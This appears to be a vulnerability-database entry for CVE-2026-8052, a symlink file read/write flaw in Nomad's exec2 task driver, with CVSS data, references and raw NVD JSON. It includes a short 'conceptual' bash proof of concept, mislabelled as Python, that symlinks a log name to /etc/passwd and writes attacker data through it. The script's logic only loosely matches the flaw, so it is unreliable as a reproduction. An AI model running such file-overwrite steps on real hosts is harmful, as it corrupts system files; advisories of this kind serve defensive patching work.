CVE-2026-8052

Description

HashiCorp Nomad’s exec2 task driver prior to 0.1.2 is vulnerable to arbitrary file read and write on the client host as the Nomad process user through a symlink attack. This vulnerability (CVE-2026-8052) is fixed in version 0.1.2 of the exec2 task driver.

CVSS Details

CVSS Score

6.0

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

HashiCorp Nomad exec2 task driver < 0.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# Conceptual PoC for CVE-2026-8052: Symlink Attack in Nomad exec2 Driver
# This script demonstrates the mechanism of the vulnerability.
# Requires: High privileges to submit jobs to Nomad.

TARGET_FILE="/etc/passwd"  # Target file to read/write on the host
SYMLINK_NAME="task_output.log"  # File name the driver attempts to write to

echo "[+] Step 1: Creating malicious symlink..."
# Inside the task's allocated sandbox, create a symlink pointing to a sensitive file.
# The exec2 driver might write stdout/stderr or artifacts to this path.
ln -sf $TARGET_FILE $SYMLINK_NAME

echo "[+] Step 2: Triggering the write operation..."
# When the exec2 driver performs operations (e.g., logging output),
# it follows the symlink and writes to the actual target file.
echo "Malicious data content" > $SYMLINK_NAME

echo "[+] Exploit complete. Check $TARGET_FILE for modifications."
# Note: This is a simplified representation of the race condition/path traversal logic.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-8052
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-8052
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-8052/
[4] VulDB https://vuldb.com/cve/CVE-2026-8052
[5] https://discuss.hashicorp.com/t/hcsec-2026-13-nomads-exec2-task-driver-vulnerable-to-arbitrary-file-read-write-on-client-host-through-symlink-attack/77415

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-8052", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:46.720", "lastModified": "2026-05-12T20:16:46.720", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "HashiCorp Nomad’s exec2 task driver prior to 0.1.2 is vulnerable to arbitrary file read and write on the client host as the Nomad process user through a symlink attack. This vulnerability (CVE-2026-8052) is fixed in version 0.1.2 of the exec2 task driver."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-59"}]}], "references": [{"url": "https://discuss.hashicorp.com/t/hcsec-2026-13-nomads-exec2-task-driver-vulnerable-to-arbitrary-file-read-write-on-client-host-through-symlink-attack/77415", "source": "[email protected]"}]}}